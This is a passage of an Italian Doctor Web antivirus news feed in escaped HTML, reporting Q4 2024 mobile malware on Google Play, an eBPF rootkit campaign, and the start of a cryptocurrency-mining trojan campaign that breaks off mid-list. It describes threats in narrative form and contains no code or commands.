      &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Questa piattaforma crea un ambiente di esecuzione virtuale nel contesto delle applicazioni in cui è incorporata. I file APK avviati tramite di esse possono funzionare come se facessero parte di tali programmi e ricevere automaticamente le stesse autorizzazioni.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute. &lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/04_adware_q4_2024_en.1.png" alt="Secondo i dati di Dr.Web Security Space per dispositivi mobili"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle cui funzionalità è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;ddApplicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney.11&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney.11&lt;/b&gt;&lt;/a&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Modulo adware che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Minacce su Google Play&lt;/h2&gt;
  &lt;p&gt;Nel IV trimestre 2024 gli analisti dei virus dell'azienda Doctor Web hanno scoperto sullo store Google Play oltre 60 varie applicazioni malevole, la maggior parte delle quali è trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Parte di essi veniva distribuita sotto le finte spoglie di programmi a tema finanziario, guide e tutorial, nonché altri software — diari, taccuini ecc. Il loro compito principale era quello di caricare siti truffa.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/05_Android.FakeApp.1708_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/06_Android.FakeApp.1729_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Programmi QuntFinanzas e Trading News che, tra gli altri numerosi trojan Android.FakeApp, caricavano siti truffa&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Altri trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; i malintenzionati spacciavano per giochi. Essi potevano caricare siti di casinò online e scommesse.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/07_Android.FakeApp.1719_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/08_Android.FakeApp.1733_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Bowl Water e Playful Petal Pursuit — esempi di giochi con funzionalità trojan&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Allo stesso tempo, i nostri specialisti &lt;a href="https://news.drweb-av.it/show/?i=14935&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;hanno rilevato&lt;/a&gt; nuove varianti del trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, che si nascondeva sotto la maschera di svariate applicazioni e anche poteva caricare siti di casinò online. &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp.1669&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; è interessante perché ottiene l'indirizzo del sito di destinazione dal file TXT del server DNS malevolo. E si manifesta solo in caso di connessione a internet tramite determinati provider.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/09_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/10_Android.FakeApp.1669_q4_2024.1.png" alt="Android.FakeApp"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Esempi di nuove varianti del trojan Android.FakeApp.1669. Il programma WordCount i truffatori spacciavano per un'utility di testo, mentre il programma Split it: Checks and Tips doveva aiutare i visitatori di caffè e ristoranti a pagare i conti e calcolare la mancia &lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Tra le minacce trovate su Google Play erano alcuni nuovi campioni della famiglia di trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, che nascondono la propria presenza sui dispositivi infetti.&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/11_Android.HiddenAds.4013_q4_2024.1.png" alt="Android.HiddenAds"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;L'app di fotoritocco Cool Fix Photo Enhancer nascondeva in sé il trojan pubblicitario Android.HiddenAds.4013&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Inoltre, sono stati registrati trojan protetti da un sofisticato packer di software — ad esempio, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57157&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt;.&lt;/p&gt;
  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/12_Android.Packed.57156_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/13_Android.Packed.57159_q4_2024.1.png" alt="Android.Packed"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Le applicazioni Lie Detector Fun Prank e Speaker Dust and Water Cleaner sono trojan protetti da packer&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Anche i nostri specialisti hanno rilevato un programma malevolo, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, studiato per l'iscrizione di utenti a servizi a pagamento. &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/14_Android.Subscription.22_q4_2024.1.png" alt="Android.Subscription"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Invece della modifica di foto, l'app InstaPhoto Editor iscriveva gli utenti a un servizio a pagamento&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Allo stesso tempo, i malintenzionati di nuovo distribuivano i trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; i quali anche abbonavano le vittime a servizi a pagamento.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/15_Android.Joker.2281_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/16_Android.Joker_q4_2024.1.png" alt="Android.Joker"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;L'app di messaggistica SMS Smart Messages e la tastiera di terzi parti Cool Keyboard cercavano di abbonare impercettibilmente le vittime a un servizio a pagamento&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Per proteggere i dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;
  &lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202024%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;

&lt;/section&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;


</description></item><item><guid>https://news.drweb-av.it/show/?i=14955&amp;lng=it</guid><title>Popolarizzazione di tecnologia eBPF e altre tendenze di sviluppo malware</title><link>https://news.drweb-av.it/show/?i=14955&amp;lng=it&amp;c=9</link><pubDate>Tue, 10 Dec 2024 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;10 dicembre 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Lo studio di un nuovo incidente cyber ha consentito agli analisti dei virus Doctor Web di scoprire una campagna hacker in corso in cui si sono manifestate molte moderne tendenze della pratica dei malintenzionati.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;All'azienda Doctor Web si è rivolto un cliente che sospettava che la sua infrastruttura informatica fosse stata hackerata. Mentre analizzavano i dati ottenuti, i nostri analisti dei virus hanno identificato più casi di infezione simili, il che ci ha consentito di concludere che era in corso una campagna attiva. Gli sforzi degli hacker si concentrano principalmente sull'Asia sud-orientale. Negli attacchi loro fanno uso di tutta una serie di programmi malevoli, che vengono adoperati in diverse fasi. Purtroppo, non siamo riusciti a determinare inequivocabilmente come sia stato ottenuto l'iniziale accesso alle macchine compromesse. Tuttavia, abbiamo potuto ricostruire l'intero quadro successivo dell'attacco. Il più degno di nota è lo sfruttamento da parte dei malintenzionati della tecnologia eBPF (extended Berkeley Packet Filter).&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;La tecnologia eBPF è stata sviluppata al fine di espandere il controllo sul sottosistema di rete del sistema operativo Linux e sul funzionamento di processi. Ha dimostrato un potenziale significativo attirando l'attenzione delle grandi aziende IT: praticamente dal momento della sua comparsa, alla eBPF Foundation si sono uniti i giganti come Google, Huawei, Intel e Netflix che hanno partecipato al suo ulteriore sviluppo. Tuttavia, anche gli hacker si sono interessati all'еBPF.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Grazie alle ampie funzionalità di basso livello, l'eBPF può essere utilizzato dai malintenzionati per nascondere attività di rete e processi, raccogliere informazioni confidenziali, nonché bypassare firewall e sistemi di rilevamento di intrusioni. L'elevata difficoltà di rilevamento di tale malware consente di utilizzarlo negli attacchi APT mirati e a lungo camuffare l'attività di hacker.&lt;/p&gt;
&lt;p&gt;Proprio di queste funzionalità hanno deciso di approfittare i malintenzionati caricando su una macchina compromessa due rootkit allo stesso tempo. Per primo veniva installato un rootkit eBPF che celava il funzionamento di un altro rootkit implementato come modulo del kernel, mentre quest'ultimo, a sua volta, preparava il sistema per l'installazione di un trojan di accesso remoto. Una particolarità del trojan è il supporto di diverse tecnologie di tunneling del traffico, il che consente ad esso di connettersi ai malintenzionati da segmenti di rete privati e camuffare la trasmissione dei comandi.&lt;/p&gt;
&lt;p&gt;L'utilizzo dei malware eBPF è in crescita dal 2023. Ciò è attestato dall'emergere di diverse famiglie di malware basate su questa tecnologia, tra cui si possono segnare Boopkit, BPFDoor e Symbiote. Mentre le vulnerabilità regolarmente identificate peggiorano ancora la situazione. Così, al giorno di oggi sono conosciute 217 vulnerabilità eBPF, di cui circa 100 sono state scoperte nel 2024.&lt;/p&gt;
&lt;p&gt;La successiva caratteristica insolita della campagna è un approccio piuttosto creativo all'archiviazione delle impostazioni del trojan. Se in precedenza a tali fini il più comunemente venivano utilizzati i server dedicati, adesso sempre più spesso si possono incontrare i casi in cui la configurazione di un malware è archiviata ad accesso aperto su piattaforme pubbliche. Così, il malware in questione si rivolgeva alle piattaforme GitHub e persino alle pagine di un blog cinese. Questa caratteristica consente di attirare meno attenzione sul traffico della macchina compromessa — infatti, essa interagisce con un nodo di rete sicuro — e inoltre, di non occuparsi di mantenere l'accesso a un server di comando con impostazioni archiviate. In generale, l'idea di sfruttare i servizi pubblicamente accessibili come infrastruttura di comando e controllo non è nuova, e in precedenza gli hacker già utilizzavano per questo scopo Dropbox, Google Drive, OneDrive e persino Discord. Tuttavia, le restrizioni su questi servizi in alcuni paesi, in primo luogo in Cina, li rendono meno attraenti in termini di accessibilità. Con tutto ciò, l'accesso a GitHub è mantenuto dalla maggior parte dei provider, il che lo rende preferibile agli occhi degli hacker.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_02.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_01.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Impostazioni memorizzate su GitLab e su un blog dedicato alla sicurezza. Una cosa curiosa è che nel secondo caso l'hacker chiede aiuto per decifrare un codice di terze parti che successivamente verrà inviato al trojan come argomento di uno dei comandi.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Un'altra caratteristica di questa campagna è stato l'utilizzo del trojan come parte del framework post-sfruttamento, cioè un complesso di software utilizzato nelle fasi successive di un attacco dopo l'ottenimento dell'accesso al computer. Di per sé tali framework non sono qualcosa di vietato — sono utilizzati da aziende che forniscono ufficialmente servizi di audit di sicurezza. Gli strumenti più popolari sono Cobalt Strike e Metasploit che consentono di automatizzare un gran numero di controlli e hanno un database delle vulnerabilità integrato.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/eBPF_04.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Esempio di mappa di rete costruita da Cobalt Strike (fonte: sito dello sviluppatore)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Naturalmente, tali funzionalità sono molto apprezzate dagli hacker. Nel 2022 è stata resa pubblica una versione craccata del software Cobalt Strike, il che ha assicurato un'impennata dell'attività hacker. Una parte significativa dell'infrastruttura Cobalt Strike è collocata in Cina. Dobbiamo notare che il produttore si impegna a tracciare le installazioni del framework, e che i server con versioni compromesse regolarmente vengono bloccati dalle forze dell'ordine. Pertanto, attualmente si osserva una stabile tendenza del passaggio verso l'uso dei framework open source che originalmente supportano la possibilità di estensione e quella di alterazione dell'attività di rete tra dispositivo infetto e server di comando. Questa strategia è preferita in quanto consente di non attirare ulteriore attenzione sull'infrastruttura degli hacker.&lt;/p&gt;

&lt;p&gt;Sulla base dei risultati dell'indagine, tutte le minacce identificate sono state aggiunte ai nostri database dei malware, inoltre, agli algoritmi euristici sono stati aggiunti i segni dei programmi malevoli eBPF.&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Siggen28.58279&amp;lng=it"&gt;&lt;b&gt;Trojan.Siggen28.58279&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Siggen28.58279" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=14920&amp;lng=it</guid><title>Nel corso di una campagna di distribuzione di un trojan per estrazione e furto di criptovalute sono stati colpiti oltre 28mila utenti</title><link>https://news.drweb-av.it/show/?i=14920&amp;lng=it&amp;c=9</link><pubDate>Tue, 08 Oct 2024 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;8 ottobre 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Gli analisti dei virus dell'azienda Doctor Web hanno scoperto una campagna su larga scala in corso di distribuzione di un malware per l'estrazione e il furto di criptovalute, nell'ambito della quale i trojan venivano consegnati sulle macchine delle vittime sotto le apparenze di programmi di ufficio, cheat per giochi e bot per trading online.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Nel corso di un'analisi di routine della telemetria cloud pervenuta dai nostri utenti, gli specialisti del laboratorio dei virus Doctor Web hanno individuato attività sospette di un programma camuffato da componente del sistema operativo Windows (&lt;span class="string"&gt;StartMenuExperienceHost.exe&lt;/span&gt;, il processo legittimo con questo nome si occupa di gestione del menu Start). Questo programma si connetteva a un nodo di rete remoto e attendeva una connessione dall'esterno per avviare immediatamente l'interprete della riga di comando &lt;span class="string"&gt;cmd.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Camuffata da componente di sistema era l'utility di rete Ncat, che viene utilizzata per scopi legittimi per la trasmissione di dati via rete tramite la riga di comando. Proprio questa scoperta ha contribuito a ripristinare la sequenza degli eventi di sicurezza tra i quali erano tentativi di infettare computer con malware, impediti dall'antivirus Dr.Web.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
 &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/1.png" class="preview"&gt;
 &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/1.1.png" alt="#drweb" /&gt;
 &lt;/a&gt;
&lt;/p&gt;  
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
 &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/2.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/2.1.png" alt="#drweb" /&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
 &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/3.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/3.1.png" alt="#drweb" /&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;La fonte dell'infezione sono siti truffa che i malintenzionati creano sulla piattaforma GitHub (notiamo che tale attività è vietata dalle regole della piattaforma) e l'avvio di programmi da lì scaricati. In alternativa, i link a malware possono essere fissati nelle descrizioni sotto video sull'hosting YouTube. Al clic sul link viene scaricato un archivio autoestraente crittografato protetto da password, il che impedisce la sua scansione automatica da parte degli antivirus. Dopo l'inserimento della password, la quale gli hacker forniscono sulla pagina di download, sul computer della vittima nella cartella &lt;span class="string"&gt;%ALLUSERSPROFILE%\jedist&lt;/span&gt; viene spacchettato il seguente set di file temporanei:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;UnRar.exe&lt;/span&gt; — programma di decompressione di archivi RAR;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;WaR.rar&lt;/span&gt; — archivio RAR;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Iun.bat&lt;/span&gt; — uno script che crea un task di esecuzione di uno script con il nome &lt;span class="string"&gt;Uun.bat&lt;/span&gt;, incomincia un riavvio del computer e rimuove sé stesso;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Uun.bat&lt;/span&gt; — uno script offuscato che spacchetta il file &lt;span class="string"&gt;WaR.rar&lt;/span&gt;, avvia i file in esso contenuti &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; e &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt;, dopodiché rimuove il task creato da &lt;span class="string"&gt;Iun.bat&lt;/span&gt; e la cartella &lt;span class="string"&gt;jedist&lt;/span&gt; insieme al suo contenuto.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; è un interprete del linguaggio AutoIt di per sé non malevolo. Tuttavia, questo non è il vero nome del file in esame. I malintenzionati hanno rinominato il file originale &lt;span class="string"&gt;AutoIt3.exe&lt;/span&gt; in &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; per mascherarlo da libreria WinRAR responsabile dell'integrare le funzioni del programma di compressione nel menu contestuale di Windows. Dopo che viene avviato, l'interprete a sua volta carica il file &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; che i malintenzionati hanno preso in prestito dall'utility Uninstall Tool. A questa libreria, firmata con firma digitale valida, loro hanno "attaccato" uno script malevolo AutoIt. Dopo la sua esecuzione, viene spacchettato il payload, tutti i file del quale sono fortemente offuscati.&lt;/p&gt;

&lt;blockquote&gt;
 AutoIt è un linguaggio di programmazione per la creazione di script di automazione e utility per sistema operativo Windows. È facile da imparare e offre ampie funzionalità, il che lo ha reso popolare tra diverse categorie di utenti, inclusi autori di virus. Alcuni programmi antivirus rilevano qualsiasi script compilato AutoIt come malevolo.
&lt;/blockquote&gt;

&lt;p&gt;Il file &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; esegue le seguenti azioni:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Cerca software di debug avviati nella lista dei processi. Lo script contiene i nomi di circa 50 diverse utility studiate per il debug, e se scopre almeno uno dei processi da questa lista, termina il proprio funzionamento&lt;/li&gt;
  &lt;li&gt;Se nessun software di debug è trovato, nel sistema compromesso vengono spacchettati i file necessari per il proseguimento dell'attacco. Parte dei file è "pulita", questi file sono necessari per implementare l'interazione di rete, mentre gli altri svolgono le attività malevole&lt;/li&gt;
  &lt;li&gt;Crea eventi di sistema per assicurare l'accesso di rete tramite Ncat e caricare i file BAT e DLL, nonché apporta modifiche al registro per implementare l'intercettazione degli avvii di applicazioni tramite la tecnica IFEO
    &lt;blockquote&gt;
